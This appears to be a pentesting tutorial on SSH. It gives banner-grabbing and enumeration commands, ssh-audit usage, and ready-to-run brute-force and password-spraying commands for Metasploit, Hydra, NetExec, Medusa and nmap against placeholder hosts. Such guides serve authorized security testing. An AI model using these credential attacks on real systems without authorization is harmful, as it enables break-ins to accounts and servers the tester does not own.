Pentesting SSH

SSH 22 Icon
SSH (Secure Shell) is a network protocol used to securely connect to and manage remote systems over an unsecured network. It provides encrypted communication and secure authentication, ensuring confidentiality and integrity of data. SSH is a critical service in security testing. For pentesters, it offers a valuable target for identifying vulnerabilities, gaining access, and performing post-exploitation tasks, making it a key focus in penetration testing activities.

Discovery and Enumeration

Several tools and techniques exist to discover SSH services across a network or on a specific device, such as a web application server. With the commands and tools outlined below, you can identify if port 22 is open and an SSH service is running. It is also important to retrieve the SSH SSH service banner, as this information can help you identify publicly available exploits for the specific product or version of SSH.

##Nmap
sudo nmap -p22 -n -sV --script ssh* 10.1.1.1      #Scan for open port 22 and obtain the service banner and more.

##Netcat
nc -v 10.1.1.1 22                                 #Use nc to manually check if port 22 is open and to fetch the banner.

##Telnet
telnet 10.1.1.1 22                                #Use Telnet to connect to port 22 to verify its status and retrieve the banner.

A simple Python script can connect to port 22 and display the service banner.

import socket
target = "10.1.1.1"
port = 22
with socket.create_connection((target, port), timeout=5) as s:
    print(s.recv(1024).decode())

Automated ssh-audit

ssh-audit is a tool for SSH server & client configuration auditing. The main focus of ssh-audit is to identify outdated, weak, or insecure SSH configurations that may expose a system to vulnerabilities. It checks for deprecated algorithms, key exchange methods, ciphers, and potential misconfigurations, helping system administrators secure their SSH services effectively. Penetration testers can use ssh-audit during reconnaissance to gather information about an SSH server’s configuration and identify potential weaknesses.

##ssh-audit
ssh-audit.py 10.1.1.1                     #Basic server auditing
ssh-audit.py -T servers.txt               #Run a standard audit against many servers (place targets into servers.txt, one on each line in the format of HOST[:PORT])

Exploitation

Finding Public Exploits for SSH

In this phase, you will have identified that port 22 is open, and an SSH service is running on the port. (Remember, SSH can run on non-standard ports as well, so ensure you scan for other open ports that may also host SSH services.) You should have performed banner grabbing using the tools and commands outlined earlier. If the SSH service is configured to disclose its banner, you can use this information to search for publicly available exploits for the specific version.

Use the collected information to search for known vulnerabilities and exploits:

 

SSH Brute Force

The SSH protocol is often a target for brute-force attacks due to its use for remote administration. If valid usernames have been identified during earlier reconnaissance, you can attempt a brute-force attack using a username:password combination list. Below are tools and techniques for conducting brute-force attacks against SSH.

Metasploit provides a module to brute-force SSH logins.

##Metasploit
sudo msfconsole -q
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 10.1.1.1                       #Target IP address or range
set USERPASS_FILE ssh_bruteforce.txt      #File with username-password pairs
set VERBOSE true                          #Print each login attempt
set THREADS 10                            #Number of concurrent threads
exploit

#To test specific cases: 
set BLANK_PASSWORDS true                  #Test for blank passwords
set USER_AS_PASS true                     #Use the username as the password

Hydra is a popular tool for brute-forcing several protocols, including SSH. It can be found here: https://github.com/vanhauser-thc/thc-hydra

##Hydra
hydra -l <username> -p <password> -s 22 10.1.1.1 ssh -t 4                                                                 #Test for a specific username and password
hydra -l <username> -P passwords.txt -s 22 10.1.1.1 ssh -t 4                                                              #Brute-force a single username with a password list
hydra -L /path/to/usernames.txt -P passwords.txt -s 22 10.1.1.1 ssh -t 4                                                  #Brute-force multiple usernames and passwords
hydra -C ~/SecLists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt -s 22 10.1.1.1 ssh -t 4                   #Brute-force using username-password combinations
hydra -C ~/SecLists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt -s 22 -M SSH_Targets.txt ssh -t 4         #Brute-force using username-password combinations for a list of SSH servers

NetExec can be used to brute-force and password-spray SSH servers. It can be found here: https://github.com/Pennyw0rth/NetExec/releases

##Netexec
#Password Spraying
nxc ssh 10.1.1.0/24 -u userfile -p passwordfile --no-bruteforce --continue-on-success      #Password spray SSH

#Testing credentials
nxc ssh 10.1.1.0/24 -u 'user' -p 'pass'                                                    #Tests credentials provided
nxc ssh 10.1.1.0/24 --port 2222                                                            #Change SSH port to non-standard port

Medusa is another brute-forcing tool with SSH support. It can be found here: https://github.com/jmk-foofus/medusa

##Medusa
medusa -h 10.1.1.1 -u <username> -p <password> -M ssh                   #Single username and password
medusa -h 10.1.1.1 -u <username> -P passwords.txt -M ssh                #Single username with password list
medusa -h 10.1.1.1 -U usernames.txt -P passwords.txt -M ssh             #Multiple usernames and passwords
medusa -H ssh_servers.txt -u <username> -p <password> -M ssh            #Single username and password with list of SSH servers
medusa -H ssh_servers.txt -U usernames.txt -P passwords.txt -M ssh      #Multiple usernames and passwords with list of SSH servers

The Nmap scripting engine includes a script for SSH brute-forcing. Use it as follows:

##Nmap
nmap -p 22 --script ssh-brute --script-args userdb=/path/to/usernames.txt,passdb=/path/to/passwords.txt <target>    #With username and password list
nmap -p 22 --script ssh-brute --script-args userdb=<username>,passdb=<password> <target>                            #With specific username-password combinations